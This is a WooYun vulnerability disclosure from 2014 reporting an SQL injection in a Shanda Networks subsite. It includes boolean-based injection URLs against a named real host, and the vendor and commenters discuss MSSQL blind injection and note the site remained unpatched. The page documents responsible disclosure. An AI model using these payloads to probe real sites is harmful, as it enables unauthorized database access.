当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056971

漏洞标题:盛大网络某分站SQL注射

相关厂商:盛大网络

漏洞作者: kobin97

提交时间:2014-04-13 23:06

修复时间:2014-05-28 23:07

公开时间:2014-05-28 23:07

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-14: 厂商已经确认,细节仅向厂商公开
2014-04-24: 细节向核心白帽子及相关领域专家公开
2014-05-04: 细节向普通白帽子公开
2014-05-14: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

盛大网络某分站SQL注射

详细说明:

错误:
http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21x&page=1
正常注入
http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=1--&page=1
错误注入
http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=2--&page=1

漏洞证明:

0.jpg


1.jpg


2.jpg

修复方案:

过滤

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-04-14 09:24

厂商回复:

感谢对盛大网络安全的关注,正在联系相关人员处理中。

最新状态:

2014-04-14:这个严格意义上说不能注入,最后一句int.parse()。


漏洞评价:

评论

  1. 2014-04-14 00:35 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    你关注的屌丝 kobin97 发表了3个漏洞

  2. 2014-04-14 11:18 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    @-@ 不能注? 审核人员看来得多来乌云学习了。。。数据库名 db_name() 为:mylNews 。其实不说了。

  3. 2014-04-14 13:30 | 盛大网络(乌云厂商)

    @kobin97 没注意CASE WHEN,SELECT IF之类的盲注入 不好意思

  4. 2014-04-14 13:32 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @kobin97 求过程

  5. 2014-04-14 13:53 | 盛大网络(乌云厂商)

    @Mr .LZH 基于超时的MSSQL盲注入

  6. 2014-04-14 13:58 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    @盛大网络 常规盲注而已。。。不用超时什么的呀。。而已是 MSSQL,可以操作的就更多了。

  7. 2014-04-14 14:01 | 盛大网络(乌云厂商)

    @kobin97 我跟他开玩笑

  8. 2014-08-15 10:29 | wiluilu ( 路人 | 还没有发布任何漏洞 | 涅槃就是死~)

    还没修诶…………

  9. 2014-08-15 15:35 | 盛大网络(乌云厂商)

    @wiluilu 鬼吹灯已非盛大游戏盛大网络.....鞭长莫及....不是盛大安全不给力,而是不属于自己的领域了.....人家不改啊